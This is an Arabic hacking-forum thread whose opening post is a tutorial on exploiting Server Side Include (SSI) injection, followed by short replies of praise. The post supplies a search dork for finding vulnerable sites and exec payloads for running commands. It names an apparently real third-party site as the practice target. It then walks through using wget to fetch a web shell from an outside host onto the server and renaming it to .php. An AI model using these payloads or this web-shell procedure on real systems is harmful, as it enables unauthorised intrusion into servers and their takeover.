السلام عليكم ورحمة الله وبركاتة كيف الحال ؟ الموضوع محتاج فقط كاسه شاي دورك بسيط : inurl:bin/Cklb/ ملاحضة : الموضوع ولفكرة مقتبسة من موقع اجنبي #...

Injection

:: Interactive Developer ::
قنبلة : شرح ثغرات من نوع ssi Injection
السلام عليكم ورحمة الله وبركاتة

كيف الحال ؟

الموضوع محتاج فقط كاسه شاي

دورك بسيط : inurl:bin/Cklb/

ملاحضة : الموضوع ولفكرة مقتبسة من موقع اجنبي #

اكواد ممكن ان تستعملها

PHP:
<!--#echo var="DATE_LOCAL" -->
Will display the Date

<!--#exec cmd="whoami"--> 
Will show which user is running on the server

<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre> (Linux) 
Will display all files in the directory

<!-- #exec cmd="dir" --> (Windows) 
Will display all files in the directory

هذا موقع للتطبيق #

http://dev.stockphotosamerica.com/bin/Cklb

نطبق الكود الثاني في الدخول

PHP:
<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>

نشوف

regionyo.png


regionoq.png


تمام الحين تاكدنا انه الثغرة موجودة وكل شيء تمام خلونا نجرب نرفع الشل

نفذ التالي

PHP:
<!--#exec cmd="wget http://website.com/dir/shell.txt" -->

regiontv.png


خلونا نشوف اذا الملف اذا انرفع ولالا

عن طريق امر

PHP:
<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>

regionwt.png


تمام انرفع بنجاح بس انرفع بصيغة تكست نفذ الامر التالي لنحولة الى بي اتش بي

PHP:
<!--#exec cmd="mv shell.txt shell.php" -->

ونتاكد الان

regionr.png


استعرض

regioncw.png


اتمنة وصلت المعلومة لكم كامل الاحترام والتقدير

اخوكم حمد المهندي




 

mido868

Moderator
قنبلة : شرح ثغرات من نوع ssi Injection
رد: قنبلة : شرح ثغرات من نوع ssi Injection

تم التقييم ياغالى
 

bscbsc

New Member
قنبلة : شرح ثغرات من نوع ssi Injection
رد: قنبلة : شرح ثغرات من نوع ssi Injection

يعطيك العآفيه اخوي
 
قنبلة : شرح ثغرات من نوع ssi Injection
رد: قنبلة : شرح ثغرات من نوع ssi Injection

موضوع قوي و رائع ، بارك الله فيك يا أخي الكريم و جزاك الله عنا كل خير
 

Dr.Bat

$ Spam King ~
قنبلة : شرح ثغرات من نوع ssi Injection
رد: قنبلة : شرح ثغرات من نوع ssi Injection

وحش ياغالي واصل الي لامام
 

Cyber Code

<img src="http://vbspiders.com/vb/images/rank/prin
HaCkEr
قنبلة : شرح ثغرات من نوع ssi Injection
رد: قنبلة : شرح ثغرات من نوع ssi Injection

جربت هالثغره من قبل على كم موقع , وفعلا ماقريت من قبل شخصياً موقع عربي شارح عنها شيء,
ملاحضة بسيطه ssi اختصار ل "server side include" وعادتا بالاصح الثغره بنستغلها في حال كان صيغة الصفحة (.shtml) وبنقدر ننفذ اوامر كانها remote code execution مثل ماموضح فوق.

واصل اخ حمد وإلى الأمام .
 

abdoog

New Member
قنبلة : شرح ثغرات من نوع ssi Injection
رد: قنبلة : شرح ثغرات من نوع ssi Injection

مشكوووور عالشرح وبارك الله فيك
 

sami hack

New Member
قنبلة : شرح ثغرات من نوع ssi Injection
رد: قنبلة : شرح ثغرات من نوع ssi Injection

مشكوووور يالغلا ع الشرح وواصل تألقك
 

hitsKy

New Member
قنبلة : شرح ثغرات من نوع ssi Injection
رد: قنبلة : شرح ثغرات من نوع ssi Injection

مشكووووووووووور
 

Injection

:: Interactive Developer ::
قنبلة : شرح ثغرات من نوع ssi Injection
رد: قنبلة : شرح ثغرات من نوع ssi Injection

منورين حبايب قلبي ..
 

sH3LL

New Member
قنبلة : شرح ثغرات من نوع ssi Injection
رد: قنبلة : شرح ثغرات من نوع ssi Injection

lبارك الله فيك على الشرح
 

Mr Talal

New Member
قنبلة : شرح ثغرات من نوع ssi Injection
رد: قنبلة : شرح ثغرات من نوع ssi Injection

:icon30::موضوع اكثر من رائع
 

SaMI-php

New Member
قنبلة : شرح ثغرات من نوع ssi Injection
رد: قنبلة : شرح ثغرات من نوع ssi Injection

جاري المتايعه​
 

inshtaine

New Member
قنبلة : شرح ثغرات من نوع ssi Injection
رد: قنبلة : شرح ثغرات من نوع ssi Injection

اخي موضوع جميل
تم التقييم ياغالى
 

L0neLy

New Member
قنبلة : شرح ثغرات من نوع ssi Injection
رد: قنبلة : شرح ثغرات من نوع ssi Injection

تحياتي
 

mafiaboy31

New Member
قنبلة : شرح ثغرات من نوع ssi Injection
رد: قنبلة : شرح ثغرات من نوع ssi Injection

nice thank's a lot my bro
 
أعلى